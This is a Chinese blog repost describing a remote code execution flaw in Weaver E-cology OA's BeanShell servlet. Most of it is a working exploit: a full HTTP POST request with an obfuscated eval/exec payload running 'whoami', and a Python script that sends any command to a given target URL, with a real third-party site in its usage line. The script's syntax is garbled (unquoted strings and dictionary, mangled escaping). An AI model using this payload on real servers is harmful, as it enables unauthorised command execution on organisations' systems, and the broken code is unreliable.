泛微E-cology OA 远程代码执行漏洞

Posted nul1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了泛微E-cology OA 远程代码执行漏洞相关的知识,希望对你有一定的参考价值。

分析文章:https://dwz.cn/bYtnsKwa

http://127.0.0.1/weaver/bsh.servlet.BshServlet

技术图片

 

若存在如上页面,则用下面数据包进行测试。

POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host:127.0.0.1:8080
Content-Length: 151
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=abc17Hyv4HXw_6_hyXo1w; testBanCookie=test
Connection: close
 
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

技术图片

EXP:

useage:python rce.py http://www.baidu.com whoami

#!/usr/bin/env python
import requests
import sys
 
headers = 
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25,
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,
    Accept-Language: zh-CN,zh;q=0.9,
    Content-Type: application/x-www-form-urlencoded

 
def exploit(url,cmd):
    target=url+/weaver/bsh.servlet.BshServlet
    payload=bsh.script=eval%00("ex"%2b"ec(\\\\"cmd+/c+\\\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw.format(cmd)
    res=requests.post(url=target,data=payload,headers=headers,timeout=10)
    res.encoding=res.apparent_encoding
    print(res.text)
 
if __name__ == __main__:
    url=sys.argv[1]
    cmd=sys.argv[2]
    exploit(url,cmd)

技术图片

 

以上是关于泛微E-cology OA 远程代码执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章

泛微OA系统多版本存在命令执行漏洞

泛微e-cology OA系统某接口存在数据库配置信息泄露漏洞复现

Python 接口开发-泛微OA的SOAP接口

泛微OA e-cology8 数据库链接

泛微e-cology和Oracle相关问题的解决方案

谁使用过泛微e-cology 6.0,请发现一下使用心得,要详细。最需要听到的是有啥不足之外,这样更好评估!